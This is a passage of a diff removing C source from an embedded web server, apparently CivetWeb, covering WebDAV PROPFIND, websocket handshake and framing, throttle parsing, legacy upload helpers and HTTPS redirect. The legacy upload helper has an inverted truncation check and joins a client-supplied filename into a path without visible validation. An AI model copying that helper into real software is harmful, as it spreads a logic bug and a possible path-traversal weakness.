-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-		/* File exists (precondition for calling this function),
-		 * but can not be opened by the server. */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot read file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-	} else {
-		conn->must_close = 1;
-		gmt_time_string(date, sizeof(date), &curtime);
-		fclose_on_exec(&filep->access, conn);
-		mg_printf(conn, "HTTP/1.1 200 OK\r\n");
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "%s%s%s"
-		          "Date: %s\r\n"
-		          "Content-Type: text/html\r\n"
-		          "Connection: %s\r\n\r\n",
-		          cors1,
-		          cors2,
-		          cors3,
-		          date,
-		          suggest_connection_header(conn));
-		send_ssi_file(conn, path, filep, 0);
-		(void)mg_fclose(&filep->access); /* Ignore errors for readonly files */
-	}
-}
-
-
-#if !defined(NO_FILES)
-static void
-send_options(struct mg_connection *conn)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (!conn) {
-		return;
-	}
-
-	conn->status_code = 200;
-	conn->must_close = 1;
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	/* We do not set a "Cache-Control" header here, but leave the default.
-	 * Since browsers do not send an OPTIONS request, we can not test the
-	 * effect anyway. */
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Date: %s\r\n"
-	          "Connection: %s\r\n"
-	          "Allow: GET, POST, HEAD, CONNECT, PUT, DELETE, OPTIONS, "
-	          "PROPFIND, MKCOL\r\n"
-	          "DAV: 1\r\n",
-	          date,
-	          suggest_connection_header(conn));
-	send_additional_header(conn);
-	mg_printf(conn, "\r\n");
-}
-
-
-/* Writes PROPFIND properties for a collection element */
-static void
-print_props(struct mg_connection *conn,
-            const char *uri,
-            struct mg_file_stat *filep)
-{
-	char mtime[64];
-
-	if ((conn == NULL) || (uri == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	gmt_time_string(mtime, sizeof(mtime), &filep->last_modified);
-	mg_printf(conn,
-	          "<d:response>"
-	          "<d:href>%s</d:href>"
-	          "<d:propstat>"
-	          "<d:prop>"
-	          "<d:resourcetype>%s</d:resourcetype>"
-	          "<d:getcontentlength>%" INT64_FMT "</d:getcontentlength>"
-	          "<d:getlastmodified>%s</d:getlastmodified>"
-	          "</d:prop>"
-	          "<d:status>HTTP/1.1 200 OK</d:status>"
-	          "</d:propstat>"
-	          "</d:response>\n",
-	          uri,
-	          filep->is_directory ? "<d:collection/>" : "",
-	          filep->size,
-	          mtime);
-}
-
-
-static int
-print_dav_dir_entry(struct de *de, void *data)
-{
-	char href[PATH_MAX];
-	int truncated;
-
-	struct mg_connection *conn = (struct mg_connection *)data;
-	if (!de || !conn) {
-		return -1;
-	}
-	mg_snprintf(conn,
-	            &truncated,
-	            href,
-	            sizeof(href),
-	            "%s%s",
-	            conn->request_info.local_uri,
-	            de->file_name);
-
-	if (!truncated) {
-		size_t href_encoded_size;
-		char *href_encoded;
-
-		href_encoded_size = PATH_MAX * 3; /* worst case */
-		href_encoded = (char *)mg_malloc(href_encoded_size);
-		if (href_encoded == NULL) {
-			return -1;
-		}
-		mg_url_encode(href, href_encoded, href_encoded_size);
-		print_props(conn, href_encoded, &de->file);
-		mg_free(href_encoded);
-	}
-
-	return 0;
-}
-
-
-static void
-handle_propfind(struct mg_connection *conn,
-                const char *path,
-                struct mg_file_stat *filep)
-{
-	const char *depth = mg_get_header(conn, "Depth");
-	char date[64];
-	time_t curtime = time(NULL);
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	if (!conn || !path || !filep || !conn->ctx) {
-		return;
-	}
-
-	conn->must_close = 1;
-	conn->status_code = 207;
-	mg_printf(conn,
-	          "HTTP/1.1 207 Multi-Status\r\n"
-	          "Date: %s\r\n",
-	          date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Connection: %s\r\n"
-	          "Content-Type: text/xml; charset=utf-8\r\n\r\n",
-	          suggest_connection_header(conn));
-
-	mg_printf(conn,
-	          "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
-	          "<d:multistatus xmlns:d='DAV:'>\n");
-
-	/* Print properties for the requested resource itself */
-	print_props(conn, conn->request_info.local_uri, filep);
-
-	/* If it is a directory, print directory entries too if Depth is not 0
-	 */
-	if (filep && filep->is_directory
-	    && !mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING], "yes")
-	    && ((depth == NULL) || (strcmp(depth, "0") != 0))) {
-		scan_directory(conn, path, conn, &print_dav_dir_entry);
-	}
-
-	mg_printf(conn, "%s\n", "</d:multistatus>");
-}
-#endif
-
-void
-mg_lock_connection(struct mg_connection *conn)
-{
-	if (conn) {
-		(void)pthread_mutex_lock(&conn->mutex);
-	}
-}
-
-void
-mg_unlock_connection(struct mg_connection *conn)
-{
-	if (conn) {
-		(void)pthread_mutex_unlock(&conn->mutex);
-	}
-}
-
-void
-mg_lock_context(struct mg_context *ctx)
-{
-	if (ctx) {
-		(void)pthread_mutex_lock(&ctx->nonce_mutex);
-	}
-}
-
-void
-mg_unlock_context(struct mg_context *ctx)
-{
-	if (ctx) {
-		(void)pthread_mutex_unlock(&ctx->nonce_mutex);
-	}
-}
-
-#if defined(USE_TIMERS)
-#define TIMER_API static
-#include "timer.inl"
-#endif /* USE_TIMERS */
-
-#ifdef USE_LUA
-#include "mod_lua.inl"
-#endif /* USE_LUA */
-
-#ifdef USE_DUKTAPE
-#include "mod_duktape.inl"
-#endif /* USE_DUKTAPE */
-
-#if defined(USE_WEBSOCKET)
-
-#if !defined(NO_SSL_DL)
-#define SHA_API static
-#include "sha1.inl"
-#endif
-
-static int
-send_websocket_handshake(struct mg_connection *conn, const char *websock_key)
-{
-	static const char *magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11";
-	char buf[100], sha[20], b64_sha[sizeof(sha) * 2];
-	SHA_CTX sha_ctx;
-	int truncated;
-
-	/* Calculate Sec-WebSocket-Accept reply from Sec-WebSocket-Key. */
-	mg_snprintf(conn, &truncated, buf, sizeof(buf), "%s%s", websock_key, magic);
-	if (truncated) {
-		conn->must_close = 1;
-		return 0;
-	}
-
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (unsigned char *)buf, (uint32_t)strlen(buf));
-	SHA1_Final((unsigned char *)sha, &sha_ctx);
-	base64_encode((unsigned char *)sha, sizeof(sha), b64_sha);
-	mg_printf(conn,
-	          "HTTP/1.1 101 Switching Protocols\r\n"
-	          "Upgrade: websocket\r\n"
-	          "Connection: Upgrade\r\n"
-	          "Sec-WebSocket-Accept: %s\r\n",
-	          b64_sha);
-	if (conn->request_info.acceptedWebSocketSubprotocol) {
-		mg_printf(conn,
-		          "Sec-WebSocket-Protocol: %s\r\n\r\n",
-		          conn->request_info.acceptedWebSocketSubprotocol);
-	} else {
-		mg_printf(conn, "%s", "\r\n");
-	}
-
-	return 1;
-}
-
-
-static void
-read_websocket(struct mg_connection *conn,
-               mg_websocket_data_handler ws_data_handler,
-               void *callback_data)
-{
-	/* Pointer to the beginning of the portion of the incoming websocket
-	 * message queue.
-	 * The original websocket upgrade request is never removed, so the queue
-	 * begins after it. */
-	unsigned char *buf = (unsigned char *)conn->buf + conn->request_len;
-	int n, error, exit_by_callback;
-
-	/* body_len is the length of the entire queue in bytes
-	 * len is the length of the current message
-	 * data_len is the length of the current message's data payload
-	 * header_len is the length of the current message's header */
-	size_t i, len, mask_len = 0, header_len, body_len;
-	uint64_t data_len = 0;
-
-	/* "The masking key is a 32-bit value chosen at random by the client."
-	 * http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-17#section-5
-	*/
-	unsigned char mask[4];
-
-	/* data points to the place where the message is stored when passed to
-	 * the
-	 * websocket_data callback.  This is either mem on the stack, or a
-	 * dynamically allocated buffer if it is too large. */
-	unsigned char mem[4096];
-	unsigned char mop; /* mask flag and opcode */
-	double timeout = -1.0;
-
-	if (conn->ctx->config[WEBSOCKET_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[WEBSOCKET_TIMEOUT]) / 1000.0;
-	}
-	if ((timeout <= 0.0) && (conn->ctx->config[REQUEST_TIMEOUT])) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	conn->in_websocket_handling = 1;
-	mg_set_thread_name("wsock");
-
-	/* Loop continuously, reading messages from the socket, invoking the
-	 * callback, and waiting repeatedly until an error occurs. */
-	while (!conn->ctx->stop_flag && !conn->must_close) {
-		header_len = 0;
-		assert(conn->data_len >= conn->request_len);
-		if ((body_len = (size_t)(conn->data_len - conn->request_len)) >= 2) {
-			len = buf[1] & 127;
-			mask_len = (buf[1] & 128) ? 4 : 0;
-			if ((len < 126) && (body_len >= mask_len)) {
-				/* inline 7-bit length field */
-				data_len = len;
-				header_len = 2 + mask_len;
-			} else if ((len == 126) && (body_len >= (4 + mask_len))) {
-				/* 16-bit length field */
-				header_len = 4 + mask_len;
-				data_len = ((((size_t)buf[2]) << 8) + buf[3]);
-			} else if (body_len >= (10 + mask_len)) {
-				/* 64-bit length field */
-				uint32_t l1, l2;
-				memcpy(&l1, &buf[2], 4); /* Use memcpy for alignment */
-				memcpy(&l2, &buf[6], 4);
-				header_len = 10 + mask_len;
-				data_len = (((uint64_t)ntohl(l1)) << 32) + ntohl(l2);
-
-				if (data_len > (uint64_t)0x7FFF0000ul) {
-					/* no can do */
-					mg_cry(conn, "websocket out of memory; closing connection");
-					break;
-				}
-			}
-		}
-
-		if ((header_len > 0) && (body_len >= header_len)) {
-			/* Allocate space to hold websocket payload */
-			unsigned char *data = mem;
-
-			if ((size_t)data_len > (size_t)sizeof(mem)) {
-				data =
-				    (unsigned char *)mg_malloc_ctx((size_t)data_len, conn->ctx);
-				if (data == NULL) {
-					/* Allocation failed, exit the loop and then close the
-					 * connection */
-					mg_cry(conn, "websocket out of memory; closing connection");
-					break;
-				}
-			}
-
-			/* Copy the mask before we shift the queue and destroy it */
-			if (mask_len > 0) {
-				memcpy(mask, buf + header_len - mask_len, sizeof(mask));
-			} else {
-				memset(mask, 0, sizeof(mask));
-			}
-
-			/* Read frame payload from the first message in the queue into
-			 * data and advance the queue by moving the memory in place. */
-			assert(body_len >= header_len);
-			if (data_len + (uint64_t)header_len > (uint64_t)body_len) {
-				mop = buf[0]; /* current mask and opcode */
-				/* Overflow case */
-				len = body_len - header_len;
-				memcpy(data, buf + header_len, len);
-				error = 0;
-				while ((uint64_t)len < data_len) {
-					n = pull_inner(NULL,
-					               conn,
-					               (char *)(data + len),
-					               (int)(data_len - len),
-					               timeout);
-					if (n <= -2) {
-						error = 1;
-						break;
-					} else if (n > 0) {
-						len += (size_t)n;
-					} else {
-						/* Timeout: should retry */
-						/* TODO: retry condition */
-					}
-				}
-				if (error) {
-					mg_cry(conn, "Websocket pull failed; closing connection");
-					if (data != mem) {
-						mg_free(data);
-					}
-					break;
-				}
-
-				conn->data_len = conn->request_len;
-
-			} else {
-
-				mop = buf[0]; /* current mask and opcode, overwritten by
-				               * memmove() */
-
-				/* Length of the message being read at the front of the
-				 * queue. Cast to 31 bit is OK, since we limited
-				 * data_len before. */
-				len = (size_t)data_len + header_len;
-
-				/* Copy the data payload into the data pointer for the
-				 * callback. Cast to 31 bit is OK, since we
-				 * limited data_len */
-				memcpy(data, buf + header_len, (size_t)data_len);
-
-				/* Move the queue forward len bytes */
-				memmove(buf, buf + len, body_len - len);
-
-				/* Mark the queue as advanced */
-				conn->data_len -= (int)len;
-			}
-
-			/* Apply mask if necessary */
-			if (mask_len > 0) {
-				for (i = 0; i < (size_t)data_len; i++) {
-					data[i] ^= mask[i & 3];
-				}
-			}
-
-			/* Exit the loop if callback signals to exit (server side),
-			 * or "connection close" opcode received (client side). */
-			exit_by_callback = 0;
-			if ((ws_data_handler != NULL)
-			    && !ws_data_handler(conn,
-			                        mop,
-			                        (char *)data,
-			                        (size_t)data_len,
-			                        callback_data)) {
-				exit_by_callback = 1;
-			}
-
-			if (data != mem) {
-				mg_free(data);
-			}
-
-			if (exit_by_callback
-			    || ((mop & 0xf) == WEBSOCKET_OPCODE_CONNECTION_CLOSE)) {
-				/* Opcode == 8, connection close */
-				break;
-			}
-
-			/* Not breaking the loop, process next websocket frame. */
-		} else {
-			/* Read from the socket into the next available location in the
-			 * message queue. */
-			n = pull_inner(NULL,
-			               conn,
-			               conn->buf + conn->data_len,
-			               conn->buf_size - conn->data_len,
-			               timeout);
-			if (n <= -2) {
-				/* Error, no bytes read */
-				break;
-			}
-			if (n > 0) {
-				conn->data_len += n;
-			} else {
-				/* Timeout: should retry */
-				/* TODO: get timeout def */
-			}
-		}
-	}
-
-	mg_set_thread_name("worker");
-	conn->in_websocket_handling = 0;
-}
-
-
-static int
-mg_websocket_write_exec(struct mg_connection *conn,
-                        int opcode,
-                        const char *data,
-                        size_t dataLen,
-                        uint32_t masking_key)
-{
-	unsigned char header[14];
-	size_t headerLen = 1;
-
-	int retval = -1;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Disable spurious conversion warning for GCC */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wconversion"
-#endif
-
-	header[0] = 0x80u | (unsigned char)((unsigned)opcode & 0xf);
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-	/* Frame format: http://tools.ietf.org/html/rfc6455#section-5.2 */
-	if (dataLen < 126) {
-		/* inline 7-bit length field */
-		header[1] = (unsigned char)dataLen;
-		headerLen = 2;
-	} else if (dataLen <= 0xFFFF) {
-		/* 16-bit length field */
-		uint16_t len = htons((uint16_t)dataLen);
-		header[1] = 126;
-		memcpy(header + 2, &len, 2);
-		headerLen = 4;
-	} else {
-		/* 64-bit length field */
-		uint32_t len1 = htonl((uint32_t)((uint64_t)dataLen >> 32));
-		uint32_t len2 = htonl((uint32_t)(dataLen & 0xFFFFFFFFu));
-		header[1] = 127;
-		memcpy(header + 2, &len1, 4);
-		memcpy(header + 6, &len2, 4);
-		headerLen = 10;
-	}
-
-	if (masking_key) {
-		/* add mask */
-		header[1] |= 0x80;
-		memcpy(header + headerLen, &masking_key, 4);
-		headerLen += 4;
-	}
-
-
-	/* Note that POSIX/Winsock's send() is threadsafe
-	 * http://stackoverflow.com/questions/1981372/are-parallel-calls-to-send-recv-on-the-same-socket-valid
-	 * but mongoose's mg_printf/mg_write is not (because of the loop in
-	 * push(), although that is only a problem if the packet is large or
-	 * outgoing buffer is full). */
-
-	/* TODO: Check if this lock should be moved to user land.
-	 * Currently the server sets this lock for websockets, but
-	 * not for any other connection. It must be set for every
-	 * conn read/written by more than one thread, no matter if
-	 * it is a websocket or regular connection. */
-	(void)mg_lock_connection(conn);
-
-	retval = mg_write(conn, header, headerLen);
-	if (dataLen > 0) {
-		retval = mg_write(conn, data, dataLen);
-	}
-
-	/* TODO: Remove this unlock as well, when lock is moved. */
-	mg_unlock_connection(conn);
-
-	return retval;
-}
-
-int
-mg_websocket_write(struct mg_connection *conn,
-                   int opcode,
-                   const char *data,
-                   size_t dataLen)
-{
-	return mg_websocket_write_exec(conn, opcode, data, dataLen, 0);
-}
-
-
-static void
-mask_data(const char *in, size_t in_len, uint32_t masking_key, char *out)
-{
-	size_t i = 0;
-
-	i = 0;
-	if ((in_len > 3) && ((ptrdiff_t)in % 4) == 0) {
-		/* Convert in 32 bit words, if data is 4 byte aligned */
-		while (i < (in_len - 3)) {
-			*(uint32_t *)(void *)(out + i) =
-			    *(uint32_t *)(void *)(in + i) ^ masking_key;
-			i += 4;
-		}
-	}
-	if (i != in_len) {
-		/* convert 1-3 remaining bytes if ((dataLen % 4) != 0)*/
-		while (i < in_len) {
-			*(uint8_t *)(void *)(out + i) =
-			    *(uint8_t *)(void *)(in + i)
-			    ^ *(((uint8_t *)&masking_key) + (i % 4));
-			i++;
-		}
-	}
-}
-
-
-int
-mg_websocket_client_write(struct mg_connection *conn,
-                          int opcode,
-                          const char *data,
-                          size_t dataLen)
-{
-	int retval = -1;
-	char *masked_data =
-	    (char *)mg_malloc_ctx(((dataLen + 7) / 4) * 4, conn->ctx);
-	uint32_t masking_key = (uint32_t)get_random();
-
-	if (masked_data == NULL) {
-		/* Return -1 in an error case */
-		mg_cry(conn,
-		       "Cannot allocate buffer for masked websocket response: "
-		       "Out of memory");
-		return -1;
-	}
-
-	mask_data(data, dataLen, masking_key, masked_data);
-
-	retval = mg_websocket_write_exec(
-	    conn, opcode, masked_data, dataLen, masking_key);
-	mg_free(masked_data);
-
-	return retval;
-}
-
-
-static void
-handle_websocket_request(struct mg_connection *conn,
-                         const char *path,
-                         int is_callback_resource,
-                         struct mg_websocket_subprotocols *subprotocols,
-                         mg_websocket_connect_handler ws_connect_handler,
-                         mg_websocket_ready_handler ws_ready_handler,
-                         mg_websocket_data_handler ws_data_handler,
-                         mg_websocket_close_handler ws_close_handler,
-                         void *cbData)
-{
-	const char *websock_key = mg_get_header(conn, "Sec-WebSocket-Key");
-	const char *version = mg_get_header(conn, "Sec-WebSocket-Version");
-	int lua_websock = 0;
-
-#if !defined(USE_LUA)
-	(void)path;
-#endif
-
-	/* Step 1: Check websocket protocol version. */
-	/* Step 1.1: Check Sec-WebSocket-Key. */
-	if (!websock_key) {
-		/* The RFC standard version (https://tools.ietf.org/html/rfc6455)
-		 * requires a Sec-WebSocket-Key header.
-		 */
-		/* It could be the hixie draft version
-		 * (http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76).
-		 */
-		const char *key1 = mg_get_header(conn, "Sec-WebSocket-Key1");
-		const char *key2 = mg_get_header(conn, "Sec-WebSocket-Key2");
-		char key3[8];
-
-		if ((key1 != NULL) && (key2 != NULL)) {
-			/* This version uses 8 byte body data in a GET request */
-			conn->content_len = 8;
-			if (8 == mg_read(conn, key3, 8)) {
-				/* This is the hixie version */
-				mg_send_http_error(conn,
-				                   426,
-				                   "%s",
-				                   "Protocol upgrade to RFC 6455 required");
-				return;
-			}
-		}
-		/* This is an unknown version */
-		mg_send_http_error(conn, 400, "%s", "Malformed websocket request");
-		return;
-	}
-
-	/* Step 1.2: Check websocket protocol version. */
-	/* The RFC version (https://tools.ietf.org/html/rfc6455) is 13. */
-	if ((version == NULL) || (strcmp(version, "13") != 0)) {
-		/* Reject wrong versions */
-		mg_send_http_error(conn, 426, "%s", "Protocol upgrade required");
-		return;
-	}
-
-	/* Step 1.3: Could check for "Host", but we do not really nead this
-	 * value for anything, so just ignore it. */
-
-	/* Step 2: If a callback is responsible, call it. */
-	if (is_callback_resource) {
-		/* Step 2.1 check and select subprotocol */
-		const char *protocols[64]; // max 64 headers
-		int nbSubprotocolHeader = get_req_headers(&conn->request_info,
-		                                          "Sec-WebSocket-Protocol",
-		                                          protocols,
-		                                          64);
-		if ((nbSubprotocolHeader > 0) && subprotocols) {
-			int cnt = 0;
-			int idx;
-			unsigned long len;
-			const char *sep, *curSubProtocol,
-			    *acceptedWebSocketSubprotocol = NULL;
-
-
-			/* look for matching subprotocol */
-			do {
-				const char *protocol = protocols[cnt];
-
-				do {
-					sep = strchr(protocol, ',');
-					curSubProtocol = protocol;
-					len = sep ? (unsigned long)(sep - protocol)
-					          : (unsigned long)strlen(protocol);
-					while (sep && isspace(*++sep))
-						; // ignore leading whitespaces
-					protocol = sep;
-
-
-					for (idx = 0; idx < subprotocols->nb_subprotocols; idx++) {
-						if ((strlen(subprotocols->subprotocols[idx]) == len)
-						    && (strncmp(curSubProtocol,
-						                subprotocols->subprotocols[idx],
-						                len) == 0)) {
-							acceptedWebSocketSubprotocol =
-							    subprotocols->subprotocols[idx];
-							break;
-						}
-					}
-				} while (sep && !acceptedWebSocketSubprotocol);
-			} while (++cnt < nbSubprotocolHeader
-			         && !acceptedWebSocketSubprotocol);
-
-			conn->request_info.acceptedWebSocketSubprotocol =
-			    acceptedWebSocketSubprotocol;
-		} else if (nbSubprotocolHeader > 0) {
-			/* keep legacy behavior */
-			const char *protocol = protocols[0];
-
-			/* The protocol is a comma separated list of names. */
-			/* The server must only return one value from this list. */
-			/* First check if it is a list or just a single value. */
-			const char *sep = strrchr(protocol, ',');
-			if (sep == NULL) {
-				/* Just a single protocol -> accept it. */
-				conn->request_info.acceptedWebSocketSubprotocol = protocol;
-			} else {
-				/* Multiple protocols -> accept the last one. */
-				/* This is just a quick fix if the client offers multiple
-				 * protocols. The handler should have a list of accepted
-				 * protocols on his own
-				 * and use it to select one protocol among those the client
-				 * has
-				 * offered.
-				 */
-				while (isspace(*++sep)) {
-					; /* ignore leading whitespaces */
-				}
-				conn->request_info.acceptedWebSocketSubprotocol = sep;
-			}
-		}
-
-		if ((ws_connect_handler != NULL)
-		    && (ws_connect_handler(conn, cbData) != 0)) {
-			/* C callback has returned non-zero, do not proceed with
-			 * handshake.
-			 */
-			/* Note that C callbacks are no longer called when Lua is
-			 * responsible, so C can no longer filter callbacks for Lua. */
-			return;
-		}
-	}
-#if defined(USE_LUA)
-	/* Step 3: No callback. Check if Lua is responsible. */
-	else {
-		/* Step 3.1: Check if Lua is responsible. */
-		if (conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS]) {
-			lua_websock =
-			    match_prefix(conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS],
-			                 strlen(
-			                     conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS]),
-			                 path);
-		}
-
-		if (lua_websock) {
-			/* Step 3.2: Lua is responsible: call it. */
-			conn->lua_websocket_state = lua_websocket_new(path, conn);
-			if (!conn->lua_websocket_state) {
-				/* Lua rejected the new client */
-				return;
-			}
-		}
-	}
-#endif
-
-	/* Step 4: Check if there is a responsible websocket handler. */
-	if (!is_callback_resource && !lua_websock) {
-		/* There is no callback, and Lua is not responsible either. */
-		/* Reply with a 404 Not Found. We are still at a standard
-		 * HTTP request here, before the websocket handshake, so
-		 * we can still send standard HTTP error replies. */
-		mg_send_http_error(conn, 404, "%s", "Not found");
-		return;
-	}
-
-	/* Step 5: The websocket connection has been accepted */
-	if (!send_websocket_handshake(conn, websock_key)) {
-		mg_send_http_error(conn, 500, "%s", "Websocket handshake failed");
-		return;
-	}
-
-	/* Step 6: Call the ready handler */
-	if (is_callback_resource) {
-		if (ws_ready_handler != NULL) {
-			ws_ready_handler(conn, cbData);
-		}
-#if defined(USE_LUA)
-	} else if (lua_websock) {
-		if (!lua_websocket_ready(conn, conn->lua_websocket_state)) {
-			/* the ready handler returned false */
-			return;
-		}
-#endif
-	}
-
-	/* Step 7: Enter the read loop */
-	if (is_callback_resource) {
-		read_websocket(conn, ws_data_handler, cbData);
-#if defined(USE_LUA)
-	} else if (lua_websock) {
-		read_websocket(conn, lua_websocket_data, conn->lua_websocket_state);
-#endif
-	}
-
-	/* Step 8: Call the close handler */
-	if (ws_close_handler) {
-		ws_close_handler(conn, cbData);
-	}
-}
-
-
-static int
-is_websocket_protocol(const struct mg_connection *conn)
-{
-	const char *upgrade, *connection;
-
-	/* A websocket protocoll has the following HTTP headers:
-	 *
-	 * Connection: Upgrade
-	 * Upgrade: Websocket
-	 */
-
-	upgrade = mg_get_header(conn, "Upgrade");
-	if (upgrade == NULL) {
-		return 0; /* fail early, don't waste time checking other header
-		           * fields
-		             */
-	}
-	if (!mg_strcasestr(upgrade, "websocket")) {
-		return 0;
-	}
-
-	connection = mg_get_header(conn, "Connection");
-	if (connection == NULL) {
-		return 0;
-	}
-	if (!mg_strcasestr(connection, "upgrade")) {
-		return 0;
-	}
-
-	/* The headers "Host", "Sec-WebSocket-Key", "Sec-WebSocket-Protocol" and
-	 * "Sec-WebSocket-Version" are also required.
-	 * Don't check them here, since even an unsupported websocket protocol
-	 * request still IS a websocket request (in contrast to a standard HTTP
-	 * request). It will fail later in handle_websocket_request.
-	 */
-
-	return 1;
-}
-#endif /* !USE_WEBSOCKET */
-
-
-static int
-isbyte(int n)
-{
-	return (n >= 0) && (n <= 255);
-}
-
-
-static int
-parse_net(const char *spec, uint32_t *net, uint32_t *mask)
-{
-	int n, a, b, c, d, slash = 32, len = 0;
-
-	if (((sscanf(spec, "%d.%d.%d.%d/%d%n", &a, &b, &c, &d, &slash, &n) == 5)
-	     || (sscanf(spec, "%d.%d.%d.%d%n", &a, &b, &c, &d, &n) == 4))
-	    && isbyte(a) && isbyte(b) && isbyte(c) && isbyte(d) && (slash >= 0)
-	    && (slash < 33)) {
-		len = n;
-		*net = ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8)
-		       | (uint32_t)d;
-		*mask = slash ? (0xffffffffU << (32 - slash)) : 0;
-	}
-
-	return len;
-}
-
-
-static int
-set_throttle(const char *spec, uint32_t remote_ip, const char *uri)
-{
-	int throttle = 0;
-	struct vec vec, val;
-	uint32_t net, mask;
-	char mult;
-	double v;
-
-	while ((spec = next_option(spec, &vec, &val)) != NULL) {
-		mult = ',';
-		if ((val.ptr == NULL) || (sscanf(val.ptr, "%lf%c", &v, &mult) < 1)
-		    || (v < 0) || ((lowercase(&mult) != 'k')
-		                   && (lowercase(&mult) != 'm') && (mult != ','))) {
-			continue;
-		}
-		v *= (lowercase(&mult) == 'k')
-		         ? 1024
-		         : ((lowercase(&mult) == 'm') ? 1048576 : 1);
-		if (vec.len == 1 && vec.ptr[0] == '*') {
-			throttle = (int)v;
-		} else if (parse_net(vec.ptr, &net, &mask) > 0) {
-			if ((remote_ip & mask) == net) {
-				throttle = (int)v;
-			}
-		} else if (match_prefix(vec.ptr, vec.len, uri) > 0) {
-			throttle = (int)v;
-		}
-	}
-
-	return throttle;
-}
-
-
-static uint32_t
-get_remote_ip(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return 0;
-	}
-	return ntohl(*(const uint32_t *)&conn->client.rsa.sin.sin_addr);
-}
-
-
-/* The mg_upload function is superseeded by mg_handle_form_request. */
-#include "handle_form.inl"
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Implement the deprecated mg_upload function by calling the new
- * mg_handle_form_request function. While mg_upload could only handle
- * HTML forms sent as POST request in multipart/form-data format
- * containing only file input elements, mg_handle_form_request can
- * handle all form input elements and all standard request methods. */
-struct mg_upload_user_data {
-	struct mg_connection *conn;
-	const char *destination_dir;
-	int num_uploaded_files;
-};
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_found(const char *key,
-                      const char *filename,
-                      char *path,
-                      size_t pathlen,
-                      void *user_data)
-{
-	int truncated = 0;
-	struct mg_upload_user_data *fud = (struct mg_upload_user_data *)user_data;
-	(void)key;
-
-	if (!filename) {
-		mg_cry(fud->conn, "%s: No filename set", __func__);
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	mg_snprintf(fud->conn,
-	            &truncated,
-	            path,
-	            pathlen - 1,
-	            "%s/%s",
-	            fud->destination_dir,
-	            filename);
-	if (!truncated) {
-		mg_cry(fud->conn, "%s: File path too long", __func__);
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	return FORM_FIELD_STORAGE_STORE;
-}
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_get(const char *key,
-                    const char *value,
-                    size_t value_size,
-                    void *user_data)
-{
-	/* Function should never be called */
-	(void)key;
-	(void)value;
-	(void)value_size;
-	(void)user_data;
-
-	return 0;
-}
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_stored(const char *path, long long file_size, void *user_data)
-{
-	struct mg_upload_user_data *fud = (struct mg_upload_user_data *)user_data;
-	(void)file_size;
-
-	fud->num_uploaded_files++;
-	fud->conn->ctx->callbacks.upload(fud->conn, path);
-
-	return 0;
-}
-
-
-/* Deprecated function mg_upload - use mg_handle_form_request instead. */
-int
-mg_upload(struct mg_connection *conn, const char *destination_dir)
-{
-	struct mg_upload_user_data fud = {conn, destination_dir, 0};
-	struct mg_form_data_handler fdh = {mg_upload_field_found,
-	                                   mg_upload_field_get,
-	                                   mg_upload_field_stored,
-	                                   0};
-	int ret;
-
-	fdh.user_data = (void *)&fud;
-	ret = mg_handle_form_request(conn, &fdh);
-
-	if (ret < 0) {
-		mg_cry(conn, "%s: Error while parsing the request", __func__);
-	}
-
-	return fud.num_uploaded_files;
-}
-#endif
-
-
-static int
-get_first_ssl_listener_index(const struct mg_context *ctx)
-{
-	unsigned int i;
-	int idx = -1;
-	if (ctx) {
-		for (i = 0; ((idx == -1) && (i < ctx->num_listening_sockets)); i++) {
-			idx = ctx->listening_sockets[i].is_ssl ? ((int)(i)) : -1;
-		}
-	}
-	return idx;
-}
-
-
-static void
-redirect_to_https_port(struct mg_connection *conn, int ssl_index)
-{
-	char host[1025];
-	const char *host_header;
-	size_t hostlen;
-
-	host_header = mg_get_header(conn, "Host");
-	hostlen = sizeof(host);
-	if (host_header != NULL) {
-		char *pos;
-
-		mg_strlcpy(host, host_header, hostlen);
-		host[hostlen - 1] = '\0';
-		pos = strchr(host, ':');
-		if (pos != NULL) {
-			*pos = '\0';
-		}
-	} else {
-		/* Cannot get host from the Host: header.
-		 * Fallback to our IP address. */
-		if (conn) {
-			sockaddr_to_string(host, hostlen, &conn->client.lsa);
-		}
-	}
-
-	/* Send host, port, uri and (if it exists) ?query_string */
-	if (conn) {
-		mg_printf(conn,
-		          "HTTP/1.1 302 Found\r\nLocation: https://%s:%d%s%s%s\r\n\r\n",
-		          host,
-#if defined(USE_IPV6)
-		          (conn->ctx->listening_sockets[ssl_index].lsa.sa.sa_family
-		           == AF_INET6)
-		              ? (int)ntohs(conn->ctx->listening_sockets[ssl_index]
-		                               .lsa.sin6.sin6_port)
-		              :
-#endif
-		              (int)ntohs(conn->ctx->listening_sockets[ssl_index]
-		                             .lsa.sin.sin_port),
-		          conn->request_info.local_uri,
